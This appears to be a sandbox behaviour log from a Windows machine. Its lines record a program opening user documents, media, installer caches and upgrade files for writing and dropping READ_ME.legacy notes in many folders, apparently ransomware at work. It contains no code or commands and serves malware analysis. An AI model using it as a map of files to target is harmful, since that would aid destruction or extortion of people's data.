Create	\Users\FD1HVy\Documents\y6_d6NLNkKhrPdj8u8.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\vxXySkvBkvcUCGq8.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\RDFnlOy4qO5Haf.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\qj-X4tc4zE0HdySgGQ.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\p_pE4760Yy.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\ncXHAwp7.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\ljhJaGuyxE50n.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\IbRuq.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\g97pMMPlr0gQGWEvC_q.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\fSnjavPAIU1yfkyNuG.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\Database1.accdb	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\abzK4JE1B8G.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\9T71r5Hs.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\9K7kOUI7n282 Y9dp.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\92dwsncOsQrOfP_rv.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\8Ui4KvRzPmj.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\8-TXyjtTI.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\79YHVBsUW0MEH.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\5epuqLEFpFsvZGh.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\5DypQ48ZRakwHGc9-kT.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\4IGX1pA.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Downloads\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Favorites\Links\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Favorites\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Favorites\Bing.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Links\OneDrive.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Links\Downloads.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Links\Desktop.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\FO7jTe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\Qxb4lX6U.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\KXHVVFp3mvrAVi5.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\6WIa6Jjj.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\OneDrive\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\Camera Roll\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\Saved Pictures\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\z_jYiB5W6TpBP3FH8O.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\Z-dg1UW6oVjp.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\xmF7RJJsPl3wxg.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\Xkq.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\xdLZCcA.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\wSbq8vmAYt.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\wj5hOjaKvc3l.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\vESygKFEw3H8fAf b6Sm.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\vb16RFycCzBr.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\vAFDzHd.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\US-p7wF9_QEE9NOfQU.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\u9P2rhycg_L5FHzE-kU.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\txhWwLGlcdRnJZt.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\rL5cLP.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\pWSuY9z6L9l.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\OTeqwCvRYPxMGw.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\okNU3my.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\nx 49yt XpGBdB5.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\NcQCE8HmyFy.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\kBSfGZV0C85sqciF.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\JsIPt8.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\J3WS97uoJ K.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\ilNALEcI2nS.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\hh5k 3rSxt.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\hCOFvsmgzu5LYwL.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\GEyT5f.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\FkoB.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\DDeuA1A_b7DAvtwgDbC.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\bhd97ASHx_vIi6NUtKYM.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\ArxvN-8o1FXQH.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\7QUkW.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\7oqeq0SRAmoJE.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\62aOVCSrWeabP.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\491u6ffCX5Qycc.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\0rDesT6kKLWA05N2x0HJ.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\0oBfVS Usv6dK.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\0HllVzVX1aBxHiyvB.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\-bG186JrIOk4zFG1.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Saved Games\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Searches\Indexed Locations.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Searches\Everywhere.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Searches\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\-pkIr 0gswkCHrf_\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\W-M_-0SasuJwP.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\f1Uz1Wg9Ik_0zvE6Q.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\bFSomikRWvtTr8H3PYId.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\9BMwU.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\AccountPictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Desktop\Mozilla Firefox.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Desktop\Google Chrome.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Desktop\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Desktop\Acrobat Reader DC.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Documents\My Music\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Documents\My Pictures\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Documents\My Videos\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Documents\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Downloads\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Libraries\RecordedTV.library-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Libraries\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Music\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Videos\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\amd64\NXQuery.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\amd64\nxquery.inf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\amd64\nxquery.cat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\amd64\hwexclude.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\amd64\hwcompat.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\amd64\BiosBlocks.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\i386\NXQuery.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\i386\nxquery.inf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\i386\nxquery.cat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\i386\hwexclude.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\i386\hwcompat.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\i386\BiosBlocks.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\Microsoft.WinJS\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\pass.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\NoNetworkConnection.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\marketing.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\logo.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\lock.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\loading.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\GetStartedHoverOver.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\GetStarted.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\eula.css	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\default_oobe.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\default_oobe.css	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\default_eos.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\default_eos.css	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\default.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\default.css	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\bullet.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\bluelogo.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\block.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Adobe\ARM\Reader_15.007.20033\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Adobe\ARM\Reader_15.023.20070\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Adobe\ARM\S\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Microsoft OneDrive\setup\refcount.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\.oracle_jre_usage\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\installcache_x64\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\javapath\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\javapath_target_474984\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\vcredist_x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\VC_redist.x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
